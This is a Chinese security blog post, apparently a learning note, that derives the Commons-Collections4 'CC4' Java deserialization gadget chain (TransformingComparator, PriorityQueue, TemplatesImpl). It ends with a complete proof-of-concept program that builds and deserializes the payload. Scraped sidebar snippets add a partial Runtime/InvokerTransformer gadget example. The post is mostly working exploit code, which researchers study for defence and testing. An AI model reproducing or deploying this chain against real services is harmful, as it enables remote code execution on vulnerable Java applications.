java cc链4

最新推荐文章于 2025-07-15 09:00:55 发布
最新推荐文章于 2025-07-15 09:00:55 发布
阅读量987 收藏 11
点赞数 6
CC 4.0 BY-SA版权
文章标签: 开发语言 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_54030686/article/details/135655134

java cc链4
在cc4上,需要在pom.xml中加入

<dependency>
            <groupId>org.apache.commons</groupId>
            <artifactId>commons-collections4</artifactId>
            <version>4.0</version>
        </dependency>

这个其实还是围绕在 ChainedTransformer.transform方法的执行,至于是使用字节码加载或者使用InvokerTransformer.transform都是可以的,
这里使用TransformingComparator.compare方法

public TransformingComparator(Transformer transformer, Comparator decorated) {
        this.decorated = decorated;
        this.transformer = transformer;
    }
    public int compare(Object obj1, Object obj2) {
        Object value1 = this.transformer.transform(obj1);
        Object value2 = this.transformer.transform(obj2);
        return this.decorated.compare(value1, value2);
    }

当传入的transformerChainedTransformer时候,就会调用ChainedTransformer.transform
所以

 transformerChain.transform(1);
 //可以替换为下面的内容
TransformingComparator transformingComparator = new TransformingComparator(transformerChain,null);
transformingComparator.compare("1",null);//或者 transformingComparator.compare(null,"1");

PriorityQueue.siftDownUsingComparator方法中调用了
heapify(); heapify() siftDown()

private void siftDownUsingComparator(int k, E x) {
    int half = size >>> 1;
    while (k < half) {
        int child = (k << 1) + 1;
        Object c = queue[child];
        int right = child + 1;
        if (right < size &&
            comparator.compare((E) c, (E) queue[right]) > 0)
            c = queue[child = right];
        if (comparator.compare(x, (E) c) <= 0)
            break;
        queue[k] = c;
        k = child;
    }
    queue[k] = x;
}

siftDownUsingComparator–>siftDown()–>heapify() ,而heapify() 位于readObject方法中,只需要满足链路过程中的if判断即可
首先在

private int size = 0;
private void heapify() {
    for (int i = (size >>> 1) - 1; i >= 0; i--)
        siftDown(i, (E) queue[i]);
}

这里解释一下size >>> 1,将size的二进制表示向右移动指定的位数,这里是1,如果size是1 二进制是0001,1>>>1输出的是0,2 0010 2>>>1 1,这里面要进入for循环中,就需要size的值最少为2,需要找到一个方法修改默认的size属性值,这里找到了offer方法,

private int size = 0;
transient Object[] queue; 
public boolean offer(E e) {
    if (e == null)
        throw new NullPointerException();
    modCount++;
    int i = size;
    if (i >= queue.length)
        grow(i + 1);
    size = i + 1;
    if (i == 0)
        queue[0] = e;
    else
        siftUp(i, e);
    return true;
}

然后发现在add方法中调用了该方法,

public boolean add(E e) {
    return offer(e);
}

随意传入一个值,使得e == null,由于queue默认为空,所以queue.length为null,if判断不成立,size = i + 1;,由于进入heapify()的for循环需要size>=2,所以需要添加两个数值,

TransformingComparator transformingComparator = new TransformingComparator(transformerChain,null);
PriorityQueue<Object> objects = new PriorityQueue<>(transformingComparator);
objects.add("1");
objects.add("2");

但是在offer方法中,i>=1,导致下一个if不成立,进入siftUp方法,然后有调用siftUpUsingComparator,导致在序列化的过程中就会执行系统命令,我们使用cc6的断链,再反射修复链路即可,这里在
TransformingComparator处进行修改,

TransformingComparator transformingComparator = new TransformingComparator(new ConstantTransformer(1));
PriorityQueue test = new PriorityQueue<>(transformingComparator);
test.add(1);
test.add(2);
Class chainedTransformerClass =transformingComparator.getClass();
Field transformer = chainedTransformerClass.getDeclaredField("transformer");
transformer.setAccessible(true);        transformer.set(transformingComparator,transformerChain);

或者 使用反射的方式修改size的属性值

TransformingComparator transformingComparator = new TransformingComparator(transformerChain);
PriorityQueue test = new PriorityQueue<>(transformingComparator);
Class aClass = test.getClass();
Field size = aClass.getDeclaredField("size");
size.setAccessible(true);
size.set(test,2);

最后的代码为

    public static void serialize(Object object) throws Exception {
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("person.bin"));
        oos.writeObject(object);
    }

    public static void unserialize(String filename) throws Exception {
        ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream(filename));
        objectInputStream.readObject();

    }
    public static void main(String[] args) throws  Exception{
        TemplatesImpl templates = new TemplatesImpl();
        Class tc=templates.getClass();
        Field name = tc.getDeclaredField("_name");
        name.setAccessible(true);
        name.set(templates,"aaaa");
        Field bytecodes = tc.getDeclaredField("_bytecodes");
        bytecodes.setAccessible(true);
        byte[] code = Files.readAllBytes(Paths.get("D:\\abc\\ceshi.class"));
        byte[][] codes= {code};
        bytecodes.set(templates,codes);
        Field tfactory = tc.getDeclaredField("_tfactory");
        tfactory.setAccessible(true);
        tfactory.set(templates,new TransformerFactoryImpl());
        InstantiateTransformer input = new InstantiateTransformer(new Class[]{Templates.class},new Object[]{templates});
        Transformer[] transformers = new Transformer[]{

                new ConstantTransformer(TrAXFilter.class),
                input
        };
        Transformer transformerChain = new ChainedTransformer(transformers);
//        transformerChain.transform(1);
        TransformingComparator transformingComparator = new TransformingComparator(transformerChain);
//        transformingComparator.compare("1",null);
//        transformingComparator.compare(null,"1");
        PriorityQueue test = new PriorityQueue<>(transformingComparator);
//        test.add(1);
//        test.add(2);
        Class aClass = test.getClass();
        Field size = aClass.getDeclaredField("size");
        size.setAccessible(true);
        size.set(test,2);

//        Class chainedTransformerClass =transformingComparator.getClass();
//        Field transformer = chainedTransformerClass.getDeclaredField("transformer");
//        transformer.setAccessible(true);
//        transformer.set(transformingComparator,transformerChain);

//        serialize(test);
        unserialize("person.bin");

    }

注意事项:导入的库需要在org.apache.commons.collections4下面

Java安全学习笔记--反序列化漏洞利用CC4
m0_64685672的博客
01-20 1740
测试环境 jdk1.8(jdk8u71) Commons Collections4.0 基于cc2和cc3,由于TransformingComparator+priorityqueue是可以触发transforme()方法所以可以利用这个两个类的组合来代替cc3中的LazyMap或Transformedmmap+AnnotationinvocationHandler的组合,从而构成了cc4。 恶意类 import com.sun.org.apache.xalan.int...
Java安全-CC全分析
sagic的博客
11-19 2343
Java安全学习,JavaCC1-7分析
10-java安全——java反序列化CC3和CC4分析
网络安全
07-20 2315
漏洞分析环境: JDK1.7.0_80 apache commons collections-3.0 在maven项目中的pom文件中添加3.1版本的依赖 <dependency> <groupId>commons-collections</groupId> <artifactId>commons-collections</artifactId> <version>3.1</version
CC总结
王嘟嘟的博客
03-14 804
整理一下CC相关的内容,单独存放,方便复习。
Commons-Collections篇-CC4分析
鸣蜩十四的博客
06-15 1109
CC4中命令执行点还是一致的,可以用TransformingComparator来代替。
CC4分析
..
10-27 1117
CC更新了一个大的版本,今天讲的是更新后的。
java磁力java磁力java磁力java磁力
08-02
java磁力
Java反序列化利用篇 | CC6分析(通用版CC
哦 卷!
09-21 1525
构造方法的第二个参数用不到,所以随意传入进行,但是重要的是它接受一个Object对象,而这个对象的类需要实现Serializable接口,如果不是,则后续的序列化不能成功。属性设置为空的map对象(除上面创建的lazyMap都行),则最终就不会触发到恶意代码 (当然其他的也行:只要保证整个子到不了恶意代码就行)。方法在反序列化的时候会被调用,因此我们只需要创建一个HashMap对象,然后序列化即可。第2步将map属性设置为一个空的map对象(除上面创建的lazyMap都行)对象中的内容不完整呢?
Java安全 CC1分析
Elite的博客
01-20 2058
Commons Collections:Java中有一个Collections包,内部封装了许多方法用来对集合进行处理,CommonsCollections则是对Collections进行了补充,完善了更多对集合处理的方法,大大提高了性能。
Java安全(七) CC1
WDWAGAAFGAGDADSA的博客
12-24 2478
Commons Collections 1的基本知识
CC4利用分析
07-08 873
我的Github主页同步更新,有简单的利用图。
CC4学习记录
weixin_44770698的博客
11-17 1025
CC4学习记录
JAVA反序列化深入学习(六):CommonsCollections4
Neolock的博客
03-28 1010
CC4CC2 的一个变种: 用 PriorityQueue 的 TransformingComparator 触发 ChainedTransformer 再利用 InstantiateTransformer 实例化 TemplatesImpl 排列组合了属于是
CC4 表排序
Laoddaaa的博客
10-15 197
CC4 表排序
Java反序列化 CC4利用记录
LTianHang的博客
02-07 282
Java反序列化 CC4利用记录
各种开发语言主要语法对比
qq_39980997的博客
07-14 874
主流编程语言语法差异对比:本文对比了Python、JavaScript、Java等11种主流编程语言的核心语法差异,主要包含五个方面: 变量与类型:分为显式类型(C++/Java等)和隐式类型(Python/JS等)两类语言的声明方式 常量声明:展示了各语言定义常量的不同语法和特性 控制结构:详细比较if条件语句和for/while循环的语法差异 函数定义:从函数声明方式和返回值要求两方面进行对比 面向对象:列举了各语言定义类和构造函数的典型语法 这些差异反映了不同语言的设计哲学、应用场景和运行机制。
职业院校网络安全攻防对抗实训室解决方案
最新发布
whwzzc的博客
07-15 833
通过这样的实训室,能够为学生提供一个真实的网络安全攻防环境,让学生在实践中学习和掌握网络安全技术,提高学生的实际操作能力和解决问题的能力,更好地满足社会对网络安全人才的迫切需求。例如,在模拟的恶意软件感染事件中,学生需要迅速检测出感染的终端设备,隔离受感染的系统,分析恶意软件的传播方式和行为特征,然后采取清除恶意软件、修复系统漏洞等措施,恢复系统的正常运行,并对事件进行总结评估,防止类似事件再次发生。在竞赛中,学生需要运用所学的网络安全知识和技能,制定攻击策略和防御方案,与对手进行激烈的较量。
Web安全-Linux基础-01-初识Linux
m0_52505633的博客
07-11 972
学习Web安全方向,需要熟练使用Linux的常用基础命令,方便后续的学习,这里是个人学习笔记,仅做参考。
网络安全小练习
2301_80296870的博客
07-12 255
IP可以在主机终端使用相关命令例如windows(ipconfig)、linux(ifconfig)输入完docker pull nginx 后出现。2.改变镜像源(推荐国内镜像源:阿里云镜像源)在该文件中配置自己的代理IP以及代理端口。配置docker daemon。登录阿里云容器镜像源服务(复制系统分配的专属地址。1.安装DOCKER。重启docker服务。
java CC 反序列化利用
03-11
### Java Commons Collections 反序列化利用 CVE 漏洞分析 #### 背景介绍 Java中的反序列化功能允许对象在网络传输或者存储介质之间转换成字节流并恢复回原状。然而,如果应用程序在不受信任的数据源上执行反序列化操作,则可能被恶意构造的对象所利用,进而触发任意代码执行等问题。 #### Apache Commons Collections 漏洞概述 Apache Commons Collections 是一个广泛使用的第三方库,在版本小于等于3.2.1时存在严重的反序列化漏洞[^2]。该漏洞使得攻击者能够创建特制的输入数据来操纵程序逻辑,最终实现远程代码执行的目的。 #### 关键类与调用条解析 针对`CommonsCollections`组件内的多个类可以构建出不同的gadget chain(工具),这些条通常涉及以下几种类: - **Transformers系列**:如 `ConstantTransformer`, `InvokerTransformer` 等用于定义特定行为变换器; - **TiedMapEntry**: 实现了 Map.Entry 接口,并且其getValue方法会触发之前设置好的transformer; - **LazyMap**: 当尝试获取不存在key对应的value时,它会自动计算这个值; 当上述组件按照一定顺序组合起来形成完整的调用路径之后就构成了所谓的“利用”。例如,在某些情况下可以通过精心设计的输入让 LazyMap 的 getValue 方法间接调用了 InvokerTransformer 中预设的方法名参数,从而达到控制目标进程的效果[^1]。 #### POC 构造思路 对于具体的 Proof Of Concept (POC),一般遵循如下模式: 1. 创建一系列必要的 Transformer 对象实例。 2. 使用 TiedMapEntry 将最后一个 transformer 和其他部分连接在一起。 3. 利用 HashMap 或 ArrayList 来承载整个结构体作为外部可见载体。 4. 最终将此复合型实体传递给待测系统的某个入口点完成实际攻击过程[^3]。 以下是基于以上描述的一个简单示例代码片段展示如何组装这样的payload: ```java // 定义所需的各种transfomer... Transformer[] transformers = new Transformer[]{ new ConstantTransformer(Runtime.class), new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}), ... }; // 构建tied entry关联到invoker transformer的结果 Map innerMap = new HashMap(); innerMap.put(key,value); Map outerMap = LazyMap.decorate(innerMap,new ChainedTransformer(transformers)); Map.Entry tiedEntry = Maps.immutableEntry(key,tiedValue); // 准备好用来发送出去的实际负载形式 Object payload = new HashMap(); ((Map)payload).put(tiedEntry,"whatever"); ``` 请注意这只是一个简化版的概念证明演示,真实环境中还需要考虑更多细节因素才能成功实施此类攻击。 #### 影响范围及修复建议 受影响的产品和服务非常广泛,特别是那些依赖于旧版本 commons-collections 库的应用程序都可能存在风险。官方已经发布新版本解决了这个问题,因此强烈建议开发者尽快升级至最新稳定发行版以消除安全隐患[^4]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值